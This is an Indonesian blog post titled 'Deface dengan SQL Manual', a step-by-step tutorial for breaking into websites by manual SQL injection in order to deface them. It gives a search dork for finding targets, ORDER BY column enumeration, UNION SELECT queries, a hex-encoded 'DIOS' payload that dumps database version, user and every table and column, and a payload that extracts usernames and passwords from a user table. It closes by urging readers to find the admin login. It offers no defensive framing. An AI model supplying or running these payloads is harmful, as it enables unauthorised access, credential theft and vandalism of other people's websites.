Deface dengan SQL Manual

    

Hai Guys :)
 Ketemu lagi dengan Saya :) ^_^
kali ini kita akan membahas tentang Tutorial Cara SQL Manual / SQLI istilahnya ya :v

Oke pertama kita dork dulu ya :)
Dorknya:
inrul:/news.php?id= site:com .net .id

kembangi lagi biar dapat prawan :v

Sekarang kita two the poin aja
target saya uda ada :)

Nah ini Target saya :)

Pertama kamu harus tambahkan sesuatu seperti (')

kan Web nya Blank berarti Vuln
sekarang kamu cari ordernya

contoh : 

+order+by+1--+ ( no blank )

+order+by+2--+ (no blank )
+order+by+7--+ (no blank)

+order+by+9--+ (blank)

cari dia sampai Blank 

kan Blank dia No 8

 nah kalian skrng https://site.com/berita.php?id=100'+union+select+1,2,3,4,5,6,7--+

untuk mecari angka togel :v

alian data bases nya

Ketemu kan Angka togelnya yang No. 2

sekarang kita Masukan Dios nya
https://site.com/berita.php?id=100'+union+select+1,Concat(0x3c43656e7465723e,0x496e6a656374696f6e204279204d72765f323331,0x3c62723e,0x3c62723e,Version(),0x3c62723e,Database(),0x3c62723e,User(),@C:=0x3c62723e,If((Select+Count(*)+From+Information_Schema.Columns+Where+Table_Schema=Database()+And+@C:=Concat(@C,0x3c62723e,Table_Name,0x3a,0x3a,0x3a,0x3a,Column_Name)),0x3a,0x00),@C)

,3,4,5,6,7--+

kan ada no .2 itu kita ganti no.2 itu dengan Dios nya :)

nah kayak gini contoh nya tadi :)

sekarang kita akan mencari UserName dan Paswoard

yang Dios itu yang tadi ganti sama

https://site.com/berita.php?id=100'+union+select+1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(h14471_13102016

.user)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x7e,password,0x3c62723e))))x)0

,3,4,5,6,7--+

nah ketemu kan username nya sama paswoard nya

kalau menemukan admin login pakai Otak kalian

Sekian Dari saya :)

• Facebook
• Twitter

Share:Deface dengan SQL Manual

• Facebook
• Twitter
• WhatsApp
• Pinterest
• LinkedIn
• Reddit
• Tumblr
• Telegram
• Email